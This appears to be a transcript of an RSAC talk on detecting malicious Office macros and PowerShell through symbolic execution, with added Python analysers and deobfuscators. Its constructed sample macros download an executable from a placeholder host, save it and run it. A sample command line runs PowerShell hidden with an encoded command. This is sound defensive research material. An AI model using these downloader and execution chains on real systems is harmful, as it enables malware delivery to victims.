#RSAC
Isolating the Ghost in the Machine: Unveiling Post Exploitation Threats
Session ID: HTA-R11
Rotem Salinas, Senior Security Researcher, RSA, [email protected], @rotemsalinas
Uri Fleyder-Kotler, Advanced Threats Research Lab Manager, RSA, [email protected], @ufleyder

Houston We Have a Problem
Agentless / non-malware attacks (scripts such as VBA macros and PowerShell rather than dropped binaries) are a rapidly growing threat
Attackers are implementing stealthier methods to bypass defenses

Research Goals
Goals
— Find a way to assess a script’s “maliciousness” automatically
— Do it without the potential harm of infection
— Make it fast!
Narrow the problem space
— VBA
— PowerShell
— Not focused on the code extraction
The same concepts can apply to similar problems

The “Imaginary Engine”
How can we develop such a 1337 imaginary engine?
Problem solving in 3 basic steps
— Analyze
— Brainstorm
— Implement

The First Step – Malware Analyst Standpoint
Traditional static analysis approach, in order: determine execution flow, deobfuscate, find suspicious activity

Perception Test – What Do Attackers Do?

The First Step – Understanding The Attacker’s Mindset

The First Step – The Attacker’s Main Objectives
Objective                               Indicators
Code execution                          Prerequisite; spawning new processes/threads
Persistency                             Disk operations, registry operations
Stealth                                 OS manipulation
Enumeration                             Registry operations, enumeration
Command & Control / Data Exfiltration   Network operations
Lateral Movement                        Network operations, enumeration

Case Study – Dridex Campaign
Peaked during 2015-2016
Used macros in Office documents to deploy Dridex variants
Targeted many companies and financial entities around the world
Delivered in large-scale spam/spear-phishing campaigns

Case Study 1 – Dridex Campaign
Entrypoint – where the code starts executing (an auto-executing macro such as AutoOpen, Document_Open or Workbook_Open)
Non-linear code execution – GoTo jumping to labels
COM object creation
URL de-obfuscation + HTTP request creation
Sending GET request
Initializing ADODB.Stream object to write the file to disk
Writing response body data to disk
Executing the downloaded file

Case Study – Anunak/Carbanak
Financial APT
Only 1 submission to VT (VirusTotal)
Attributed to the Anunak cybergang
Final payload: VBS/PowerShell, then a PE executable
See full analysis in the appendix

The Second Step – Brainstorming
Common approaches, pros and cons
Hooking
— Use available source code or patch an existing DLL/EXE
— Insert code that sinks certain expressions
— Remove potentially harmful code
Taint Analysis / Symbolic Execution
— Implement an engine that emulates the language interpreter
— The engine evaluates each line of code
— Instead of invoking potentially harmful expressions it sinks them

We Have a Winner!
Symbolic Execution
Pros
— Cannot harm the machine in any way (even if we missed something)
— We know exactly how it works. NO reverse engineering!
— Not limited to a specific platform/OS
Cons
— Hard to implement
— Might lack some language functionality

Symbolic Execution: Double Sweep Method
First sweep
— Global context: global variables, code
— Function declarations
— External DLL declarations

Symbolic Execution: Double Sweep Method
Second sweep
— Function code, starting with the entrypoint
— Follows execution flow
— Executes stubs instead of built-in language functions
— Evaluates expressions: math, string manipulation, logical expressions (condition evaluation)

Implementation Details
Python
— PyParsing
— Dave Beazley’s (Python guru) PLY – Python Lex-Yacc
— Lex – lexical analysis/tokenizer
— Yacc (Yet Another Compiler Compiler) – syntax analyzer
BNF – Backus-Naur Form
Where to start: RTFM

Lexical Analyzer (Tokenizer)
Tokens
— Language keywords
— Immediate values: strings, integer/numeric values, floating point values, arrays/compound data types
— Identifiers – variable names, function names, object names
— Operators – math, bitwise, logical, string manipulation
* Diagram courtesy of David Beazley

Syntax Analyzer (Parser)
Parses the language syntax according to the tokenized output from the lexer
The language syntax/grammar is defined by multiple functions
Each function represents a BNF expression and passes the parsed/extracted values to the next function in line according to the BNF statement
* Diagram courtesy of David Beazley
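Added example (not the presenters’ code and not PLY itself): a hand-rolled lexer and recursive-descent parser in Python for the expression subset of VBA, showing the two stages the slides build with PLY. The lexer is one regex alternative per token class (what PLY Lex’s t_* rules express), and each parser method is one BNF rule that returns its value to its caller, as a PLY Yacc p_* function does through p[0]. Together they are the “deobfuscate” step: VBA string built-ins are stubbed, so a string assembled from Chr/StrReverse/Mid calls reduces to its plain value without running any macro. The grammar subset, the KEYWORDS set, the BUILTINS stubs and the sample expressions are assumptions made for this example.

```python
import re

# Token classes from the "Lexical Analyzer" slide: keywords, immediate values, identifiers, operators.
KEYWORDS = {"set", "dim", "as", "if", "then", "else", "end", "sub", "function", "call",
            "goto", "and", "or", "not", "mod", "true", "false"}
TOKEN_RE = re.compile("|".join([
    r"(?P<WS>[ \t]+)", r"(?P<COMMENT>'[^\n]*)", r"(?P<NEWLINE>\n)", r"(?P<NUMBER>\d+)",
    r'(?P<STRING>"(?:[^"]|"")*")', r"(?P<IDENT>[A-Za-z_]\w*)", r"(?P<OP><>|<=|>=|[-+*/&=<>(),.])",
]))

def tokenize(src):
    """Lexer: one regex alternative per token type (PLY's t_* rules do the same); returns (type, value) pairs."""
    pos, out = 0, []
    while pos < len(src):
        m = TOKEN_RE.match(src, pos)
        if not m: raise SyntaxError(f"illegal character {src[pos]!r} at offset {pos}")
        kind, text, pos = m.lastgroup, m.group(), m.end()
        if kind in ("WS", "COMMENT"): continue
        if kind == "IDENT" and text.lower() in KEYWORDS:
            kind = "KEYWORD"
        elif kind == "STRING":
            text = text[1:-1].replace('""', '"')           # VBA doubles a quote to escape it
        elif kind == "NUMBER":
            text = int(text)
        out.append((kind, text))
    return out

BUILTINS = {   # stubs for the string functions macros use to assemble strings at runtime (assumed subset)
    "chr": chr, "asc": lambda s: ord(s[0]), "strreverse": lambda s: s[::-1], "len": len,
    "mid": lambda s, start, n=None: s[start - 1:] if n is None else s[start - 1:start - 1 + n],
    "ucase": str.upper, "lcase": str.lower, "replace": lambda s, a, b: s.replace(a, b),
}

class Parser:
    """Recursive descent over the token list. Each method is one BNF rule and returns that rule's
    value to its caller, which is what a PLY p_* function does through p[0]:
        expr    ::= concat (("=" | "<>") concat)?
        concat  ::= sum ("&" sum)*
        sum     ::= term (("+" | "-") term)*
        term    ::= primary (("*" | "/" | "Mod") primary)*
        primary ::= NUMBER | STRING | True | False | IDENT "(" [expr ("," expr)*] ")" | IDENT | "(" expr ")"
    """
    def __init__(self, tokens, env):
        self.toks, self.i, self.env = tokens, 0, env

    def at(self, op):                          # is the next token this operator or keyword?
        tok = self.toks[self.i] if self.i < len(self.toks) else ("EOF", "")
        return tok[0] in ("OP", "KEYWORD") and str(tok[1]).lower() == op

    def take(self):
        if self.i >= len(self.toks): raise SyntaxError("unexpected end of expression")
        self.i += 1; return self.toks[self.i - 1]

    def expr(self):
        left = self.concat()
        if self.at("="): self.take(); return left == self.concat()
        if self.at("<>"): self.take(); return left != self.concat()
        return left

    def concat(self):
        value = self.sum()
        while self.at("&"):
            self.take(); value = str(value) + str(self.sum())   # '&' always coerces to string
        return value

    def sum(self):
        value = self.term()
        while self.at("+") or self.at("-"):
            op, rhs = self.take()[1], self.term()
            value = value + rhs if op == "+" else value - rhs
        return value

    def term(self):
        value = self.primary()
        while self.at("*") or self.at("/") or self.at("mod"):
            op, rhs = self.take()[1].lower(), self.primary()
            value = value * rhs if op == "*" else value / rhs if op == "/" else value % rhs
        return value

    def primary(self):
        kind, text = self.take()
        if kind in ("NUMBER", "STRING"): return text
        if kind == "KEYWORD" and text.lower() in ("true", "false"): return text.lower() == "true"
        if kind == "OP" and text == "(":
            value = self.expr()
            if self.take() != ("OP", ")"): raise SyntaxError("expected ')'")
            return value
        if kind == "IDENT" and not self.at("("): return self.env[text.lower()]   # variable lookup
        if kind == "IDENT":
            self.take(); args = []
            while not self.at(")"):
                args.append(self.expr())
                if self.at(","): self.take()
            self.take()
            return BUILTINS[text.lower()](*args)                 # stub call, no real side effect
        raise SyntaxError(f"unexpected token {kind} {text!r}")

def evaluate(expr, env=None):
    """Tokenize and parse one VBA expression, returning its value with the obfuscation undone."""
    p = Parser(tokenize(expr), env or {})
    value = p.expr()
    if p.i != len(p.toks): raise SyntaxError("trailing tokens")
    return value
```

evaluate() raises SyntaxError on input outside the subset rather than guessing, and a call to a function that is not in BUILTINS raises KeyError; in a real engine that is the signal to add a stub or to route the call into a user-defined procedure, which is what the second sweep does.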

PLY Lex Example
* Diagram courtesy of David Beazley

Tokenizer Demo

PLY Yacc Example
* Diagram courtesy of David Beazley

Engine Design Overview
Scoring
— Blacklisted behavior observed: score++
— Whitelisted behavior observed: score--
— A higher score means more malicious
— If score >= threshold Then isMalicious = True

Obfuscation As Heuristics
Obfuscation can be a strong indicator of malicious behavior
Examples
— Object returned from a function call
— Object created from a string that is itself a function call’s return value

Obfuscation As Heuristics – More Examples
— Self-modifying code (during runtime)
— Data read from controls embedded in the document (e.g. UserForm text boxes) is considered suspicious
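The double-sweep method, the blacklist/whitelist scoring and the obfuscation heuristics above, worked as one added example in Python that is not the presenters’ engine: a toy symbolic executor for a small VBA subset. Sweep 1 collects constants and procedure bodies; sweep 2 walks from the auto-exec entrypoint, follows GoTo and procedure calls, evaluates "&" concatenation and a few stubbed built-ins, and records every CreateObject, method call and Shell as an event instead of performing it. A CreateObject whose argument is computed (a concatenation or a function’s return value) adds to the score, as the obfuscation slides suggest. The score weights, the threshold of 5, the ProgID lists, the stub semantics and the sample macro (constructed to mirror the Dridex case-study flow, with a placeholder URL) are all assumptions of this example; If/loops, typed values and a recursion limit are not modelled.

```python
import re

# Assumed weights: the slides give the scheme (blacklist score++, whitelist score--), not numbers.
BLACKLIST = {"msxml2.xmlhttp": (3, "network"), "winhttp.winhttprequest.5.1": (3, "network"),
             "adodb.stream": (2, "filesystem"), "wscript.shell": (3, "exec"), "shell.application": (3, "exec")}
WHITELIST = {"word.application", "excel.application"}      # ordinary Office automation: score--

def split_top(expr, sep):
    """Split on sep at parenthesis depth 0 and outside string literals."""
    parts, cur, depth, quoted = [], "", 0, False
    for ch in expr:
        quoted ^= ch == '"'
        depth += (not quoted) * ((ch == "(") - (ch == ")"))
        if ch == sep and depth == 0 and not quoted:
            parts.append(cur); cur = ""
        else:
            cur += ch
    return [p.strip() for p in parts + [cur] if p.strip()]

class Engine:
    """Sweep 1 (constructor): global context and procedure bodies. Sweep 2 (run): walk from the entrypoint."""
    def __init__(self, src):
        self.globals, self.procs, self.events, self.score, cur = {}, {}, [], 0, None
        for line in (l.strip() for l in src.splitlines()):
            if m := re.match(r"(?:Public |Private )?(?:Sub|Function) (\w+)\s*\(([^)]*)\)", line, re.I):
                params = [p.split()[0].lower() for p in m.group(2).split(",") if p.strip()]
                cur = self.procs[m.group(1).lower()] = {"params": params, "body": []}
            elif re.match(r"End (Sub|Function)", line, re.I): cur = None
            elif cur is not None: cur["body"].append(line)
            elif m := re.match(r"(?:Public |Private )?Const (\w+)\s*=\s*(.*)", line, re.I):
                self.globals[m.group(1).lower()] = self.evaluate(m.group(2), {})
        for ep in ("autoopen", "auto_open", "document_open", "workbook_open"):   # auto-exec macros
            if ep in self.procs: self.run(ep, []); break
        self.malicious = self.score >= 5                        # assumed threshold

    def sink(self, kind, value, delta):       # record a would-be side effect instead of performing it
        self.events.append((kind, value)); self.score += delta

    def evaluate(self, expr, local):
        out = ""
        for part in split_top(expr, "&"):                       # '&' string concatenation
            if part.startswith('"'): out += part[1:-1]
            elif m := re.fullmatch(r"(\w+)\((.*)\)", part):       # call to a user Function or a stub
                if m.group(1).lower() == "createobject" and not re.fullmatch(r'"[^"]*"', m.group(2).strip()):
                    self.sink("obfuscation", "computed CreateObject argument: " + m.group(2), 1)
                out += str(self.run(m.group(1), [self.evaluate(a, local) for a in split_top(m.group(2), ",")]))
            else:                                               # variable (locals shadow globals); unknown names stay symbolic
                out += str(local.get(part.lower(), self.globals.get(part.lower(), part)))
        return out

    def run(self, name, args):
        key = name.lower()
        if key == "createobject":                               # stub: nothing is ever instantiated
            progid = args[0].lower()
            delta, cat = (-1, "whitelisted") if progid in WHITELIST else BLACKLIST.get(progid, (0, "unknown"))
            self.sink("createobject:" + cat, progid, delta); return f"<COM:{progid}>"
        if key == "environ": return f"%{args[0].upper()}%"      # symbolic, never the host's real value
        if key == "strreverse": return args[0][::-1]
        if key == "shell": self.sink("shell", args[0], 3); return "0"
        if key not in self.procs: return ""                     # unmodelled built-in: ignored
        local = dict(zip(self.procs[key]["params"], args))
        self.exec_body(self.procs[key]["body"], local)
        return local.get(key, "")                               # a Function's result is assigned to its own name

    def exec_body(self, body, local):
        labels = {l[:-1].lower(): i for i, l in enumerate(body) if re.fullmatch(r"\w+:", l)}
        pc, steps = 0, 0
        while pc < len(body) and steps < 10_000:                # step budget defeats GoTo loops
            line, pc, steps = body[pc], pc + 1, steps + 1
            if re.fullmatch(r"\w+:", line): continue
            if m := re.match(r"GoTo (\w+)$", line, re.I):
                pc = labels[m.group(1).lower()]
            elif m := re.match(r"(?:Set )?(\w+)\s*=\s*(.*)", line, re.I):
                local[m.group(1).lower()] = self.evaluate(m.group(2), local)
            elif m := re.match(r"(\w+)\.(\w+)\s*=?\s*(.*)", line):   # method call or property set
                obj = str(local.get(m.group(1).lower(), ""))
                if obj.startswith("<COM:"):
                    args = [self.evaluate(a, local) for a in split_top(m.group(3), ",")]
                    self.sink("method", f"{obj[5:-1]}.{m.group(2).lower()}({', '.join(args)})", 0)
            elif m := re.match(r"(?:Call )?(\w+)\s*\(?(.*?)\)?$", line, re.I):
                self.run(m.group(1), [self.evaluate(a, local) for a in split_top(m.group(2), ",")])

SAMPLE_MACRO = r'''
Public Const part1 = "MSXML2."
Sub AutoOpen()
    GoTo stage1
    Shell "never.exe", 1
stage1:
    Set http = CreateObject(part1 & "XMLHTTP")
    url = "http://" & "example.invalid" & "/drop.exe"
    http.Open "GET", url, False
    Set strm = CreateObject("ADODB" & ".Stream")
    strm.SaveToFile Environ("TEMP") & "\x.exe", 2
    Set sh = CreateObject(Sneaky())
    sh.Run Environ("TEMP") & "\x.exe", 0
End Sub
Function Sneaky() As String
    Sneaky = StrReverse("llehS.tpircSW")
End Function
'''  # constructed sample mirroring the Dridex case-study flow; the URL is a placeholder
```

Engine(SAMPLE_MACRO).events is the evidence an analyst would read: the three obfuscated CreateObject calls resolved to their real ProgIDs, the GET to the deobfuscated URL, the SaveToFile path and the WScript.Shell Run, while the dead Shell call behind the GoTo never fires. The step budget bounds GoTo loops, but a Function that calls itself still hits Python’s own recursion limit, which is the "recursion limit" challenge the lessons-learned slide mentions.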

Demo The Engine

The Age Old Question of FP vs. FN
False positives
False negatives
A lower threshold trades false negatives for false positives; a higher one does the reverse
Decide what works best for you!

Lessons Learned
Challenges
— Condition evaluation
— Recursion limit
Lessons
— When in doubt, bruteforce!
— Use the language specification as a guideline rather than implementing every language feature that exists

Apply
DIY 1: Develop It Yourself
DIY 2: Deploy In Your Organization
— Network
— Endpoint
Use it for your investigations

Q&A
Rotem Salinas – @rotemsalinas
Uri Fleyder-Kotler – @ufleyder

VBA Indicators of Suspicious Activity
File system operations
— COM objects: Scripting.FileSystemObject, ADODB.Stream
— Cmd – output redirect / copy / del / move
— Open built-in function
— Importing external DLLs – URLMON
Network operations
— COM objects: Microsoft.XMLHTTP, WinHttp.WinHttpRequest
OS manipulation
— Importing external DLLs – KERNEL32
— WMI objects
Registry
— Importing external DLLs – ADVAPI32

VBA Indicators of Suspicious Activity
Enumeration
— WMI objects
— Cmd – net share / net use / ipconfig / environment variables
Obfuscation
— Self-modifying code: Eval, CodeModule
— Obfuscation beyond reasonable doubt

VBA Indicators of Suspicious Activity
Indicator classes
— COM object creation
— WMI object creation
— Self-modifying code: Eval, CodeModule
— Built-in functions
— Importing external DLLs
— Obfuscation beyond reasonable doubt

VBA – COM Object Creation – Network Activity
Rule of thumb: if your Office documents are communicating, you are in serious trouble
Network activity – COM objects
— Microsoft.XMLHTTP
— MSXML2.SERVERXMLHTTP.6.0
— MSXML2.SERVERXMLHTTP
— MSXML2.XMLHTTP
— WinHttp.WinHttpRequest.5.1
— WinHttp.WinHttpRequest
— InternetExplorer.Application

VBA – COM Object Creation – Network Activity
Microsoft.XMLHTTP
WinHttp.WinHttpRequest.5.1

VBA – COM Object Creation – File System Activity
Scripting.FileSystemObject
ADODB.Stream

VBA – COM Object Creation – Command Execution
WScript.Shell
Shell.Application

VBA – COM Object Creation – Obfuscation
XStandard.Base64
MSXML2.DOMDocument.3.0 / MSXML2.DOMDocument – abused for Base64 decoding through an element whose dataType is bin.base64

VBA – Built-In Functions
— CreateObject – creates a COM object from its ProgID string
— GetObject – obtains a COM object from a moniker (e.g. a winmgmts: WMI moniker) or a file
— Eval – covered under self-modifying code
— ExecuteGlobal – VBScript specific
— CallByName – calls a function/method by string name
— Shell – executes a command
— Environ – evaluates environment variables
— Kill – deletes a file
— Application.Run – calls a function by string name

VBA – WMI Object Creation
Moniker passed to GetObject: winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2

VBA – Self-Modifying Code – Code Module
CodeModule – allows modification of the VBA code itself through the VBE object model (VBProject.VBComponents(...).CodeModule); requires “Trust access to the VBA project object model” to be enabled

VBA – Self-Modifying Code – Eval
Eval – evaluates a string as an expression and executes it (VBScript; in VBA proper only Access exposes Application.Eval)
ExecuteGlobal – VBScript only: executes a string as statements in the global scope

VBA – Open Built-In Function
Write to a file with the Open built-in function (Open path For Binary/Output As #n, then Put/Print #n); no COM object is involved, so a ProgID blacklist alone does not see it

VBA – Importing External DLL
Win32 API via Declare statements (Declare [PtrSafe] Function ... Lib "kernel32" ...)

Appendix – Case Study 1 A – Dridex
Entrypoint – where the code starts executing
Non-linear code execution – GoTo jumping to labels
COM object creation
URL de-obfuscation + HTTP request creation
Sending GET request
Initializing ADODB.Stream object to write the file to disk
Writing response body data to disk
Executing the downloaded file
![Page 68: Isolating the Ghost in the Machine: Unveiling Post Exploitation Threats · PDF fileIsolating the Ghost in the Machine: Unveiling Post Exploitation Threats. HTA-R11. Senior Security](https://reader031.vdocuments.us/reader031/viewer/2022030501/5aad60567f8b9a693f8e4480/html5/thumbnails/68.jpg)
#RSAC
Appendix – Case Study 1 B - Dridex
68
Defining Globals
Entrypoint
Appendix – Case Study 1 B - Dridex (slides 69–74)
Create obfuscated COM object
Create more obfuscated COM objects
Deobfuscate URL and create GET request
Send GET request
Receive Response Body and write to File
Save To Disk
Execution
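The six Dridex slides annotate screenshots of the macro, and only the stage callouts survive in this transcript. The following Python is an added example, not code from the talk or from RSA: it scores a VBA macro by how many stages of that COM downloader chain it contains after the string obfuscation is folded away. The slides only say "obfuscated COM object", so the Chr()/& concatenation style, the ProgIDs (MSXML2.XMLHTTP, ADODB.Stream, WScript.Shell), the URL and the whole sample macro are constructed assumptions for illustration.

```python
import re

# Constructed sample in the shape the Dridex slides annotate: ProgIDs and the
# URL are assembled from Chr() calls and & concatenation. The slides only say
# "obfuscated COM object", so this particular style is an assumption.
SAMPLE_MACRO = r'''
Sub AutoOpen()
    Dim h, s, w
    Set h = CreateObject(Chr(77) & "SXML2." & Chr(88) & "MLHTTP")
    Set s = CreateObject("ADODB" & "." & "Stream")
    Set w = CreateObject(Chr(87) & "Script." & "Shell")
    h.Open "GET", "http" & "://" & "example" & ".invalid/" & Chr(97) & ".exe", False
    h.Send
    s.Type = 1
    s.Open
    s.Write h.ResponseBody
    s.SaveToFile Environ("TEMP") & "\a.exe", 2
    w.Run Environ("TEMP") & "\a.exe"
End Sub
'''

_CHR = re.compile(r'\bChr\((\d+)\)', re.I)
_CONCAT = re.compile(r'"([^"]*)"\s*&\s*"([^"]*)"')


def fold_strings(src: str) -> str:
    """Turn Chr(n) into a literal, then fold "a" & "b" into "ab" until stable.
    Only literal-with-literal joins are folded, so Environ("TEMP") & "..."
    is left alone (its value is only known at run time)."""
    src = _CHR.sub(lambda m: '"' + chr(int(m.group(1))) + '"', src)
    while True:
        new = _CONCAT.sub(lambda m: '"' + m.group(1) + m.group(2) + '"', src)
        if new == src:
            return src
        src = new


# One pattern per stage, in the order the slides walk through the macro.
# Groups capture the ProgID / URL so the report can show what was resolved.
STAGES = [
    ("create_com_object", re.compile(r'CreateObject\(\s*"([^"]+)"', re.I)),
    ("http_get_request",  re.compile(r'\.Open\s+"GET"\s*,\s*"(https?://[^"]+)"', re.I)),
    ("send_request",      re.compile(r'\.Send\b', re.I)),
    ("response_to_file",  re.compile(r'\.Write\s+\w+\.ResponseBody\b', re.I)),
    ("save_to_disk",      re.compile(r'\.SaveToFile\b', re.I)),
    ("execution",         re.compile(r'\.(?:Run|Exec|ShellExecute)\b', re.I)),
]


def analyze_macro(src: str) -> dict:
    """Score a VBA macro by how many stages of the COM downloader chain it
    contains after deobfuscation. All six present = the full Dridex pattern."""
    folded = fold_strings(src)
    found = {name: rx.findall(folded) for name, rx in STAGES}
    present = [name for name, hits in found.items() if hits]
    return {
        "progids": found["create_com_object"],
        "urls": found["http_get_request"],
        "stages": present,
        "score": len(present),
        "downloader_chain": len(present) == len(STAGES),
    }


if __name__ == "__main__":
    report = analyze_macro(SAMPLE_MACRO)
    for key, value in report.items():
        print(f"{key}: {value}")
```

Folding before matching is the point: the stage patterns never see `Chr(77) & "SXML2."`, only the recovered `MSXML2.XMLHTTP`, so the same rules work on the plain and the obfuscated macro. A benign document macro that does not touch CreateObject, network and Run at all scores zero.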
Appendix – Case Study 2 - Ananuk (slides 75–80)
Entrypoint
De-obfuscate
Beacon and Deploy final Payload
De-obfuscate
Beacon Command & Control – Phase 1
De-obfuscate
Beacon Command & Control – Phase 2
De-obfuscate
Deploy Base64 Payload
Write Base64 Decoded Payload to Temp Path
Execute Payload
Analyzing Payload 1
Payload is an icon, used for credibility
Attempts to gain persistence on the victim's machine both by using known Autorun registry paths and by creating a scheduled task using the schtasks command
Appendix – Powershell Indicators of Suspicious Activity (slide 81)
.NET Objects: .NET Reflection, Add-Type, New-Object
WinAPI32 DLL Loading
WMI Objects: Invoke-WmiMethod
Command Execution: Invoke-Command
COM Objects: New-Object -Com
Appendix – Powershell Obfuscation (slide 82)
Obfuscation Methods
Base64
SecureString
Custom Decoding Methods
Powershell Techniques - .NET Reflection (slide 83)
Example 1 – LoadWithPartialName
Example 2 - LoadName
Powershell Techniques - Add-Type .NET code injection (slide 84)
Creation of a new type/class using .NET code
Creating an instance of the class and invoking its Start method
Powershell Techniques – New-Object (slide 85)
Creating an object instance. In this example a System.Net.WebClient instance is created in order to download a file
Powershell Techniques - Invoke-WmiMethod (slide 86)
Using WMI for enumeration and system manipulation. In this case, creating a key in the Windows registry
Powershell Techniques - DLL loading (slide 87)
Resolving Native Win32 API functions
$module = "kernel32.dll"
API Function to be resolved
Powershell Techniques - New-Object -com (slide 88)
Similarly to the COM objects in VBA, the same COM objects can be used in Powershell using this command
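The indicator list on slide 81 and the technique slides 83–88 name what to look for, but the screenshots that showed each technique are not in this transcript. The Python scanner below is an added example, not code from the talk or from RSA: it scores a PowerShell script against those indicator families (.NET reflection, Add-Type, New-Object, Win32 DLL loading through DllImport/kernel32.dll, WMI, Invoke-Command, New-Object -Com). Every pattern ignores case and tolerates a backtick between characters, so the tick and case obfuscations from slide 89 do not defeat it. The weights, the threshold and the two sample scripts are constructed assumptions.

```python
import re

# Indicator families from the "Indicators of Suspicious Activity" slide, each
# with the literal tokens the technique slides show. Weights are an assumption
# of this example (New-Object is common in benign admin scripts, so it counts
# least); a trailing '*' marks a prefix token (Load, LoadFrom, LoadFile ...).
INDICATORS = {
    "dotnet_reflection": (3, ["Reflection.Assembly]::Load*", "LoadWithPartialName"]),
    "add_type":          (3, ["Add-Type"]),
    "new_object":        (1, ["New-Object"]),
    "win32_dll_loading": (3, ["DllImport", "kernel32.dll", "GetProcAddress", "LoadLibrary"]),
    "wmi":               (2, ["Invoke-WmiMethod", "Get-WmiObject"]),
    "command_execution": (2, ["Invoke-Command", "Invoke-Expression"]),
    "com_object":        (2, ["-ComObject", "-Com"]),
}
THRESHOLD = 5  # assumption: two strong families, or one plus helpers


def token_regex(token: str) -> str:
    """Regex for one token that survives two obfuscations from the slides:
    case changes (re.I at compile time) and backticks, which PowerShell
    ignores before a non-special character (Ne`w-Ob`ject). Tokens without
    '*' must end at a word boundary so -Com does not match -ComputerName."""
    prefix = token.endswith("*")
    body = r"`?".join(re.escape(c) for c in token.rstrip("*"))
    return body if prefix else body + r"(?!\w)"


_COMPILED = {
    family: re.compile("|".join(token_regex(t) for t in tokens), re.I)
    for family, (_, tokens) in INDICATORS.items()
}


def scan(script: str) -> dict:
    """Return the matched tokens per family, a weighted score and a verdict."""
    hits, score = {}, 0
    for family, (weight, _) in INDICATORS.items():
        found = _COMPILED[family].findall(script)
        if found:
            hits[family] = found
            score += weight
    return {"hits": hits, "score": score, "suspicious": score >= THRESHOLD}


# Constructed samples (not from the talk). The first follows the Case Study 3
# shape: Add-Type compiling C# that imports Win32 functions, a WebClient, a
# tick-obfuscated COM shell object and process creation through WMI.
SAMPLE_SUSPICIOUS = r'''
$src = '[DllImport("kernel32.dll")] public static extern IntPtr LoadLibrary(string n);'
Ad`d-Type -MemberDefinition $src -Name K -Namespace W
$wc = New-Object System.Net.WebClient
$sh = Ne`w-Object -Co`mObject WScript.Shell
Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList "notepad.exe"
'''
SAMPLE_BENIGN = r'''
Get-ChildItem $env:TEMP -Recurse | Where-Object { $_.Length -gt 1MB } |
    Sort-Object Length -Descending | Select-Object -First 10
'''

if __name__ == "__main__":
    for name, sample in (("suspicious", SAMPLE_SUSPICIOUS), ("benign", SAMPLE_BENIGN)):
        print(name, scan(sample))
```

Scoring by family rather than by raw hit count keeps one `New-Object` in an admin script from tipping the verdict, while Add-Type plus DllImport plus a COM shell object in one script does. A script that only reflects an assembly (`[System.Reflection.Assembly]::LoadWithPartialName`) is recorded but stays below the threshold on its own, which is the trade-off such a static pre-filter has to make before a sandbox run.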
Powershell Techniques Obfuscation (slide 89)
Obfuscation methods in Powershell:
Adding Ticks (a backtick escapes special characters but is ignored before non-special characters) + Lowercase/Uppercase
String Concatenation/Manipulation
Get-Command + WildCards + Aliases
Invoke-Expression
Powershell Techniques Obfuscation - Base64 (slide 90)
Base64 using .NET classes
CertUtil: by executing the certutil tool as a command
certutil -decode encodedInputFileName decodedOutputFileName
Case Study 3 – Targeted Spear Phishing Campaign (slide 91)
Javascript outer script with obfuscated strings
A list of strings including commands and base64 encoded payloads
Each string in the list is reversed
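Slides 89–90 list the obfuscation layers (ticks, case changes, string concatenation, Base64 through .NET classes or certutil) and the Case Study 3 slide adds a JavaScript layer whose string list is stored reversed. The Python below is an added example, not the speakers' code: it undoes those layers statically, stripping only the backticks PowerShell would ignore while keeping real escapes, folding literal concatenation, decoding an -EncodedCommand argument (Base64 of UTF-16LE) and reversing and decoding a Case Study 3 style string list. It does not handle the SecureString method from slide 82, which needs the key material. The sample strings are constructed for this example, not the campaign's.

```python
import base64
import binascii
import re

# Backtick sequences that do change meaning (`n newline, `t tab, `0 null, `" `' `$
# literal characters, `u{..} Unicode, backtick-newline line continuation). The
# PowerShell parser drops a backtick before any other character, which is what
# makes Ne`w-Ob`ject run as New-Object. Keeping both letter cases is the
# conservative choice: a real escape is never stripped.
_ESCAPES = set('0abefnrtuv`"\'$\r\n')
_TICK = re.compile(r'`(.)', re.S)

# 'a'+'b' or "a"+"b" (same quote type on both sides), and ( 'a' ) wrappers that
# are not a method call, e.g. &('New-Object') but not ::FromBase64String('x').
_CONCAT = re.compile(r"""(['"])((?:(?!\1).)*)\1\s*\+\s*\1((?:(?!\1).)*)\1""")
_PAREN = re.compile(r"""(?<![\w\]])\(\s*(['"])((?:(?!\1).)*)\1\s*\)""")

# -e, -ec, -en, -enc, ... -EncodedCommand followed by the Base64 argument.
_ENC = re.compile(r'-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]+)', re.I)


def strip_ticks(s: str) -> str:
    """Remove backticks that PowerShell would ignore; keep real escapes."""
    return _TICK.sub(
        lambda m: m.group(0) if m.group(1).lower() in _ESCAPES else m.group(1), s)


def fold_concat(s: str) -> str:
    """Fold adjacent literal concatenation and parenthesised single literals
    until nothing changes: &('Ne'+'w-Ob'+'ject') -> &'New-Object'."""
    while True:
        new = _CONCAT.sub(lambda m: m.group(1) + m.group(2) + m.group(3) + m.group(1), s)
        new = _PAREN.sub(lambda m: m.group(1) + m.group(2) + m.group(1), new)
        if new == s:
            return s
        s = new


def normalize(script: str) -> str:
    """Tick removal then concatenation folding. Case is left alone on purpose:
    lowering the text would corrupt embedded Base64; match case-insensitively
    instead (PowerShell itself is case-insensitive)."""
    return fold_concat(strip_ticks(script))


def _bytes_to_text(data: bytes):
    """UTF-16LE when every odd byte is NUL (the -EncodedCommand encoding),
    otherwise UTF-8; None when the bytes are not printable text."""
    if data and len(data) % 2 == 0 and not any(data[1::2]):
        text = data.decode('utf-16-le')
    else:
        try:
            text = data.decode('utf-8')
        except UnicodeDecodeError:
            return None
    return text if all(c.isprintable() or c in '\r\n\t' for c in text) else None


def decode_encoded_command(cmdline: str):
    """Decode the Base64 UTF-16LE argument of -EncodedCommand (any prefix form);
    returns None if the command line carries none. (certutil -decode, shown on
    the same slide, performs the same Base64 step for a file on disk.)"""
    m = _ENC.search(cmdline)
    if not m:
        return None
    return base64.b64decode(m.group(1), validate=True).decode('utf-16-le')


def deobfuscate_reversed_list(js: str) -> list:
    """Case Study 3 style: every string literal in the JavaScript array is
    stored reversed; after reversing, items that are clean Base64 text
    (UTF-16LE or UTF-8) are decoded, anything else is kept as the reversed
    string (commands, paths)."""
    out = []
    for lit in re.findall(r'"([^"]*)"', js):
        s = lit[::-1]
        try:
            text = _bytes_to_text(base64.b64decode(s, validate=True))
        except binascii.Error:
            text = None
        out.append(text if text is not None else s)
    return out


# Constructed sample in the shape the Case Study 3 slide describes (not the
# campaign's real strings): a reversed command prefix, a reversed Base64
# UTF-16LE encoded command ("dir"), and a reversed Base64 payload ("Add-Type").
SAMPLE_JS = ('var a = ["cne- neddih w- pon- llehsrewop", '
             '"AIHApBAZ", "=UGc5RVLkRWQ"];')

if __name__ == '__main__':
    print(normalize("&('Ne'+'w-Ob'+'ject') -Co`mObject WScript.Shell"))
    print(decode_encoded_command('powershell -nop -w hidden -enc ZABpAHIA'))
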